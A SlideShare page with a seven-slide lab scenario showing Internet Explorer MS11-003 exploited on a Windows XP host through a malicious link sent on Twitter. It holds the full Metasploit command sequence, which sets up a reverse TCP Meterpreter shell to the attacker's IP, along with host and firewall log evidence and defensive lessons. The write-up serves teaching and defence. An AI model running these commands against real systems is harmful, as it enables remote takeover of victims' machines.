SlideShare a Scribd company logo

Metasploit Exploitation Scenarios -EN : Scenario 1

Download as KEY, PDF
Eric Romang
Eric Romang

First part of the Metasploit Exploitation Scenarios serie

Technology
1 of 7
Metasploit Scenarios Scenario 1 Http:://eromang.zataz.com - Http://twitter.com/eromang
Scenario 1 : Topology Target Firewall Attacker Gateway 192.168.111.0/24 192.168.178.0/24 Target : - Windows XP SP3 - User has an admin profile - IP : 192.168.111.129 - Default gateway : 192.168.111.128 - No anti-virus / Local Windows Firewall activated - Vulnerable to MS11-03 Firewall Gateway : - Eth0 : 192.168.111.128 (internal interface) - Eth1 : 192.168.178.59 (external interface) Attacker : - IP : 192.168.178.21
Scenario 1 : Firewall rules • Firewall administration by SSH only from internal network • Internal network is allowed to request «Any» protocols to external network
Scenario 1 : Story-Board ✤ This network topology is corresponding to most of broadband ADSL Internet connexions for home users, and SMB. ✤ Attacker send a Twitter message to the target. The message contain a malicious URL (could be shortened) in order to exploit Internet Explorer MS11-03 vulnerability. ✤ The target click on the provided link and MS11-03 is exploited. ✤ After the exploitation a reverse_tcp meterpreter payload, on port 4444/TCP, is launched. ✤ No further post-exploitations
Scenario 1 : Metasploit commands use exploit/windows/browser/ms11_003_ie_css_import set SRVHOST 192.168.178.21 set SRVPORT 80 set URIPATH /readme.html set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.21 exploit sysinfo ipconfig route getuid
Scenario 1 : Evidences Internet Explorer process is created : A new process has been created: New Process ID: 3200 Image File Name: C:Program FilesInternet Exploreriexplore.exe Creator Process ID: 2224 User Name: romang Domain: ERIC-FD2123B3C5 Logon ID: (0x0,0x62764) Internet Explorer process create a new «notepad.exe» process : A new process has been created: New Process ID: 3972 Image File Name: C:WINDOWSsystem32notepad.exe Creator Process ID: 3200 User Name: romang Domain: ERIC-FD2123B3C5 Logon ID: (0x0,0x62764) Logs on the Firewall Gateway Feb 21 15:31:52 fw1 kernel: [18410.843231] RULE 5 -- ACCEPT IN=eth0 OUT=eth1 SRC=192.168.111.129 DST=192.168.178.21 LEN=48 TOS=0x00 PREC=0x00 TTL=127 ID=2845 DF PROTO=TCP SPT=1078 DPT=4444 WINDOW=64240 RES=0x00 SYN URGP=0
Scenario 1 : Leasons Learned •Update your OS and applications ! •Don’t run applications with administrator privileges ! •Never click on unknown links, specialy shortened URL’s, from unknown sources ! •Install an antivirus and don’t trust him :) •Don’t trust your Firewalls (Local or remote) ! •Don’t allow «Any» outbound protocols connexions from your internal network to untrusted networks ! Limit your outbound connexions to your real needs. 7

Recommended

Metasploit Exploitation Scenarios -EN : Scenario 2
Metasploit Exploitation Scenarios -EN : Scenario 2Metasploit Exploitation Scenarios -EN : Scenario 2
Metasploit Exploitation Scenarios -EN : Scenario 2Eric Romang
 
Optix Pro Bo2 K Trojan
Optix Pro Bo2 K TrojanOptix Pro Bo2 K Trojan
Optix Pro Bo2 K TrojanShinra
 
Cybersecurity Essentials - Part 1
Cybersecurity Essentials - Part 1Cybersecurity Essentials - Part 1
Cybersecurity Essentials - Part 1Shobhit Sharma
 
Windows xp compromise and remedies
Windows xp compromise and remediesWindows xp compromise and remedies
Windows xp compromise and remediesBikrant Gautam
 
Leeme
LeemeLeeme
LeemeJohan Vasco
 
Disabling Ports 135 and 445 to protect the Road Warrior
Disabling Ports 135 and 445 to protect the Road WarriorDisabling Ports 135 and 445 to protect the Road Warrior
Disabling Ports 135 and 445 to protect the Road WarriorDavid Sweigert
 
Detecting hardware keyloggers
Detecting hardware keyloggersDetecting hardware keyloggers
Detecting hardware keyloggersmihailowitsch
 
Backdoor
BackdoorBackdoor
Backdoorphanleson
 

Recommended

Metasploit Exploitation Scenarios -EN : Scenario 2
Metasploit Exploitation Scenarios -EN : Scenario 2Metasploit Exploitation Scenarios -EN : Scenario 2
Metasploit Exploitation Scenarios -EN : Scenario 2Eric Romang
 
Optix Pro Bo2 K Trojan
Optix Pro Bo2 K TrojanOptix Pro Bo2 K Trojan
Optix Pro Bo2 K TrojanShinra
 
Cybersecurity Essentials - Part 1
Cybersecurity Essentials - Part 1Cybersecurity Essentials - Part 1
Cybersecurity Essentials - Part 1Shobhit Sharma
 
Windows xp compromise and remedies
Windows xp compromise and remediesWindows xp compromise and remedies
Windows xp compromise and remediesBikrant Gautam
 
Leeme
LeemeLeeme
LeemeJohan Vasco
 
Disabling Ports 135 and 445 to protect the Road Warrior
Disabling Ports 135 and 445 to protect the Road WarriorDisabling Ports 135 and 445 to protect the Road Warrior
Disabling Ports 135 and 445 to protect the Road WarriorDavid Sweigert
 
Detecting hardware keyloggers
Detecting hardware keyloggersDetecting hardware keyloggers
Detecting hardware keyloggersmihailowitsch
 
Backdoor
BackdoorBackdoor
Backdoorphanleson
 
Embedded government espionage
Embedded government espionageEmbedded government espionage
Embedded government espionageMuts Byte
 
Computer securety
Computer securetyComputer securety
Computer securetyrushil ahmed
 
Cracking wep
Cracking wepCracking wep
Cracking wepPedro Guillén Núñez
 
Hardware key logger
Hardware key loggerHardware key logger
Hardware key loggerTamim1980
 
Remove search.portsayd.com redirect virus
Remove search.portsayd.com redirect virusRemove search.portsayd.com redirect virus
Remove search.portsayd.com redirect virusjesicasruma
 
Conficker
ConfickerConficker
ConfickerBobmathews
 
SSMF (Security Scope Metasploit Framework) - Course Syllabus
SSMF (Security Scope Metasploit Framework) - Course SyllabusSSMF (Security Scope Metasploit Framework) - Course Syllabus
SSMF (Security Scope Metasploit Framework) - Course SyllabusSecurity Scope
 
Symantec Freak Vulnerability Infographic
Symantec Freak Vulnerability InfographicSymantec Freak Vulnerability Infographic
Symantec Freak Vulnerability InfographicSymantec
 
Secure LXC Networking
Secure LXC NetworkingSecure LXC Networking
Secure LXC NetworkingMarian Marinov
 
metaploit framework
metaploit frameworkmetaploit framework
metaploit frameworkLe Quyen
 
Compromising windows 8 with metasploit’s exploit
Compromising windows 8 with metasploit’s exploitCompromising windows 8 with metasploit’s exploit
Compromising windows 8 with metasploit’s exploitIOSR Journals
 
Rooted2020 emotet is-dead_long_live_emotet_-_victor_acin
Rooted2020 emotet is-dead_long_live_emotet_-_victor_acinRooted2020 emotet is-dead_long_live_emotet_-_victor_acin
Rooted2020 emotet is-dead_long_live_emotet_-_victor_acinRootedCON
 
Countering Innovative Sandbox Evasion Techniques Used by Malware
Countering Innovative Sandbox Evasion Techniques Used by MalwareCountering Innovative Sandbox Evasion Techniques Used by Malware
Countering Innovative Sandbox Evasion Techniques Used by MalwareTyler Borosavage
 
Stuxnet dc9723
Stuxnet dc9723Stuxnet dc9723
Stuxnet dc9723Iftach Ian Amit
 
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliDefcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliPriyanka Aash
 
Honeycon2016-honeypot updates for public
Honeycon2016-honeypot updates for publicHoneycon2016-honeypot updates for public
Honeycon2016-honeypot updates for publicJulia Yu-Chin Cheng
 
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsHacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsShakacon
 
Final Engagement
Final EngagementFinal Engagement
Final EngagementJefferson Green
 
Metasploit for Web Workshop
Metasploit for Web WorkshopMetasploit for Web Workshop
Metasploit for Web WorkshopDennis Maldonado
 
Linux router
Linux routerLinux router
Linux routerMiguel E Arellano Quezada
 
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessHacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessEC-Council
 
Stuxnet mass weopan of cyber attack
Stuxnet mass weopan of cyber attackStuxnet mass weopan of cyber attack
Stuxnet mass weopan of cyber attackAjinkya Nikam
 

More Related Content

What's hot

Embedded government espionage
Embedded government espionageEmbedded government espionage
Embedded government espionageMuts Byte
 
Hardware key logger
Hardware key loggerHardware key logger
Hardware key loggerTamim1980
 
Remove search.portsayd.com redirect virus
Remove search.portsayd.com redirect virusRemove search.portsayd.com redirect virus
Remove search.portsayd.com redirect virusjesicasruma
 
SSMF (Security Scope Metasploit Framework) - Course Syllabus
SSMF (Security Scope Metasploit Framework) - Course SyllabusSSMF (Security Scope Metasploit Framework) - Course Syllabus
SSMF (Security Scope Metasploit Framework) - Course SyllabusSecurity Scope
 
Symantec Freak Vulnerability Infographic
Symantec Freak Vulnerability InfographicSymantec Freak Vulnerability Infographic
Symantec Freak Vulnerability InfographicSymantec
 

What's hot (9)

Embedded government espionage
Embedded government espionageEmbedded government espionage
Embedded government espionage
 
Computer securety
Computer securetyComputer securety
Computer securety
 
Cracking wep
Cracking wepCracking wep
Cracking wep
 
Hardware key logger
Hardware key loggerHardware key logger
Hardware key logger
 
Remove search.portsayd.com redirect virus
Remove search.portsayd.com redirect virusRemove search.portsayd.com redirect virus
Remove search.portsayd.com redirect virus
 
Conficker
ConfickerConficker
Conficker
 
SSMF (Security Scope Metasploit Framework) - Course Syllabus
SSMF (Security Scope Metasploit Framework) - Course SyllabusSSMF (Security Scope Metasploit Framework) - Course Syllabus
SSMF (Security Scope Metasploit Framework) - Course Syllabus
 
Symantec Freak Vulnerability Infographic
Symantec Freak Vulnerability InfographicSymantec Freak Vulnerability Infographic
Symantec Freak Vulnerability Infographic
 
Secure LXC Networking
Secure LXC NetworkingSecure LXC Networking
Secure LXC Networking
 

Similar to Metasploit Exploitation Scenarios -EN : Scenario 1

metaploit framework
metaploit frameworkmetaploit framework
metaploit frameworkLe Quyen
 
Compromising windows 8 with metasploit’s exploit
Compromising windows 8 with metasploit’s exploitCompromising windows 8 with metasploit’s exploit
Compromising windows 8 with metasploit’s exploitIOSR Journals
 
Rooted2020 emotet is-dead_long_live_emotet_-_victor_acin
Rooted2020 emotet is-dead_long_live_emotet_-_victor_acinRooted2020 emotet is-dead_long_live_emotet_-_victor_acin
Rooted2020 emotet is-dead_long_live_emotet_-_victor_acinRootedCON
 
Countering Innovative Sandbox Evasion Techniques Used by Malware
Countering Innovative Sandbox Evasion Techniques Used by MalwareCountering Innovative Sandbox Evasion Techniques Used by Malware
Countering Innovative Sandbox Evasion Techniques Used by MalwareTyler Borosavage
 
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliDefcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliPriyanka Aash
 
Honeycon2016-honeypot updates for public
Honeycon2016-honeypot updates for publicHoneycon2016-honeypot updates for public
Honeycon2016-honeypot updates for publicJulia Yu-Chin Cheng
 
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsHacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsShakacon
 
Metasploit for Web Workshop
Metasploit for Web WorkshopMetasploit for Web Workshop
Metasploit for Web WorkshopDennis Maldonado
 
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessHacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessEC-Council
 
Stuxnet mass weopan of cyber attack
Stuxnet mass weopan of cyber attackStuxnet mass weopan of cyber attack
Stuxnet mass weopan of cyber attackAjinkya Nikam
 
Malwares Malwares Malwares Malwares Malwares
Malwares Malwares Malwares Malwares MalwaresMalwares Malwares Malwares Malwares Malwares
Malwares Malwares Malwares Malwares MalwaresNioLemuelLazatinConc
 
1. inside source IP address and port number 172.16.1.2020translat.pdf
1. inside source IP address and port number 172.16.1.2020translat.pdf1. inside source IP address and port number 172.16.1.2020translat.pdf
1. inside source IP address and port number 172.16.1.2020translat.pdfmeejuhaszjasmynspe52
 
Cisco Malware: A new risk to consider in perimeter security designs
Cisco Malware: A new risk to consider in perimeter security designsCisco Malware: A new risk to consider in perimeter security designs
Cisco Malware: A new risk to consider in perimeter security designsManuel Santander
 
Taming botnets
Taming botnetsTaming botnets
Taming botnetsf00d
 
Life Cycle And Detection Of Bot Infections Through Network Traffic Analysis
Life Cycle And Detection Of Bot Infections Through Network Traffic AnalysisLife Cycle And Detection Of Bot Infections Through Network Traffic Analysis
Life Cycle And Detection Of Bot Infections Through Network Traffic AnalysisPositive Hack Days
 

Similar to Metasploit Exploitation Scenarios -EN : Scenario 1 (20)

metaploit framework
metaploit frameworkmetaploit framework
metaploit framework
 
Compromising windows 8 with metasploit’s exploit
Compromising windows 8 with metasploit’s exploitCompromising windows 8 with metasploit’s exploit
Compromising windows 8 with metasploit’s exploit
 
Rooted2020 emotet is-dead_long_live_emotet_-_victor_acin
Rooted2020 emotet is-dead_long_live_emotet_-_victor_acinRooted2020 emotet is-dead_long_live_emotet_-_victor_acin
Rooted2020 emotet is-dead_long_live_emotet_-_victor_acin
 
Countering Innovative Sandbox Evasion Techniques Used by Malware
Countering Innovative Sandbox Evasion Techniques Used by MalwareCountering Innovative Sandbox Evasion Techniques Used by Malware
Countering Innovative Sandbox Evasion Techniques Used by Malware
 
Stuxnet dc9723
Stuxnet dc9723Stuxnet dc9723
Stuxnet dc9723
 
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliDefcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
 
Honeycon2016-honeypot updates for public
Honeycon2016-honeypot updates for publicHoneycon2016-honeypot updates for public
Honeycon2016-honeypot updates for public
 
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsHacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
 
Final Engagement
Final EngagementFinal Engagement
Final Engagement
 
Metasploit for Web Workshop
Metasploit for Web WorkshopMetasploit for Web Workshop
Metasploit for Web Workshop
 
Linux router
Linux routerLinux router
Linux router
 
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessHacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
 
Stuxnet mass weopan of cyber attack
Stuxnet mass weopan of cyber attackStuxnet mass weopan of cyber attack
Stuxnet mass weopan of cyber attack
 
Malwares Malwares Malwares Malwares Malwares
Malwares Malwares Malwares Malwares MalwaresMalwares Malwares Malwares Malwares Malwares
Malwares Malwares Malwares Malwares Malwares
 
1. inside source IP address and port number 172.16.1.2020translat.pdf
1. inside source IP address and port number 172.16.1.2020translat.pdf1. inside source IP address and port number 172.16.1.2020translat.pdf
1. inside source IP address and port number 172.16.1.2020translat.pdf
 
STUXNET_
STUXNET_STUXNET_
STUXNET_
 
Cisco Malware: A new risk to consider in perimeter security designs
Cisco Malware: A new risk to consider in perimeter security designsCisco Malware: A new risk to consider in perimeter security designs
Cisco Malware: A new risk to consider in perimeter security designs
 
I Heart Stuxnet
I Heart StuxnetI Heart Stuxnet
I Heart Stuxnet
 
Taming botnets
Taming botnetsTaming botnets
Taming botnets
 
Life Cycle And Detection Of Bot Infections Through Network Traffic Analysis
Life Cycle And Detection Of Bot Infections Through Network Traffic AnalysisLife Cycle And Detection Of Bot Infections Through Network Traffic Analysis
Life Cycle And Detection Of Bot Infections Through Network Traffic Analysis
 

Recently uploaded

Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsMiki Katsuragi
 
Training state-of-the-art general text embedding
Training state-of-the-art general text embeddingTraining state-of-the-art general text embedding
Training state-of-the-art general text embeddingZilliz
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsSergiu Bodiu
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clashcharlottematthew16
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyAlfredo García Lavilla
 
The Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdfThe Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdfSeasiaInfotech2
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Manik S Magar
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupFlorian Wilhelm
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii SoldatenkoFwdays
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machinePadma Pradeep
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxNavinnSomaal
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr BaganFwdays
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfAlex Barbosa Coqueiro
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Scott Keck-Warren
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxhariprasad279825
 

Recently uploaded (20)

Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering Tips
 
Training state-of-the-art general text embedding
Training state-of-the-art general text embeddingTraining state-of-the-art general text embedding
Training state-of-the-art general text embedding
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clash
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easy
 
The Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdfThe Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdf
 
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machine
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptx
 

Metasploit Exploitation Scenarios -EN : Scenario 1

  • 1. Metasploit Scenarios Scenario 1 Http:://eromang.zataz.com - Http://twitter.com/eromang
  • 2. Scenario 1 : Topology Target Firewall Attacker Gateway 192.168.111.0/24 192.168.178.0/24 Target : - Windows XP SP3 - User has an admin profile - IP : 192.168.111.129 - Default gateway : 192.168.111.128 - No anti-virus / Local Windows Firewall activated - Vulnerable to MS11-03 Firewall Gateway : - Eth0 : 192.168.111.128 (internal interface) - Eth1 : 192.168.178.59 (external interface) Attacker : - IP : 192.168.178.21
  • 3. Scenario 1 : Firewall rules • Firewall administration by SSH only from internal network • Internal network is allowed to request «Any» protocols to external network
  • 4. Scenario 1 : Story-Board ✤ This network topology is corresponding to most of broadband ADSL Internet connexions for home users, and SMB. ✤ Attacker send a Twitter message to the target. The message contain a malicious URL (could be shortened) in order to exploit Internet Explorer MS11-03 vulnerability. ✤ The target click on the provided link and MS11-03 is exploited. ✤ After the exploitation a reverse_tcp meterpreter payload, on port 4444/TCP, is launched. ✤ No further post-exploitations
  • 5. Scenario 1 : Metasploit commands use exploit/windows/browser/ms11_003_ie_css_import set SRVHOST 192.168.178.21 set SRVPORT 80 set URIPATH /readme.html set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.21 exploit sysinfo ipconfig route getuid
  • 6. Scenario 1 : Evidences Internet Explorer process is created : A new process has been created: New Process ID: 3200 Image File Name: C:Program FilesInternet Exploreriexplore.exe Creator Process ID: 2224 User Name: romang Domain: ERIC-FD2123B3C5 Logon ID: (0x0,0x62764) Internet Explorer process create a new «notepad.exe» process : A new process has been created: New Process ID: 3972 Image File Name: C:WINDOWSsystem32notepad.exe Creator Process ID: 3200 User Name: romang Domain: ERIC-FD2123B3C5 Logon ID: (0x0,0x62764) Logs on the Firewall Gateway Feb 21 15:31:52 fw1 kernel: [18410.843231] RULE 5 -- ACCEPT IN=eth0 OUT=eth1 SRC=192.168.111.129 DST=192.168.178.21 LEN=48 TOS=0x00 PREC=0x00 TTL=127 ID=2845 DF PROTO=TCP SPT=1078 DPT=4444 WINDOW=64240 RES=0x00 SYN URGP=0
  • 7. Scenario 1 : Leasons Learned •Update your OS and applications ! •Don’t run applications with administrator privileges ! •Never click on unknown links, specialy shortened URL’s, from unknown sources ! •Install an antivirus and don’t trust him :) •Don’t trust your Firewalls (Local or remote) ! •Don’t allow «Any» outbound protocols connexions from your internal network to untrusted networks ! Limit your outbound connexions to your real needs. 7

Editor's Notes

  1. \n
  2. \n
  3. \n
  4. \n
  5. \n
  6. \n
  7. \n